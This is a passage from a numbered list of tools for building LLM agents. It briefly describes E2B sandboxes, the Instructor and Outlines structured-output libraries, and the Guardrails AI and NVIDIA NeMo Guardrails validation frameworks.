  4. E2B — Sandboxed cloud environments for safe agent code execution — the standard for code-executing agents.
  5. Instructor — Pydantic-based structured output extraction for LLMs. Essential for reliable agent-tool communication.
  6. Outlines — Grammar-constrained generation for open-source models. Guarantees structured output without post-hoc parsing.
  7. Guardrails AI — Open-source framework for adding input/output validation, safety checks, and format enforcement to LLM applications.
  8. NVIDIA NeMo Guardrails — Programmable guardrails for controlling agent behaviour in conversational systems.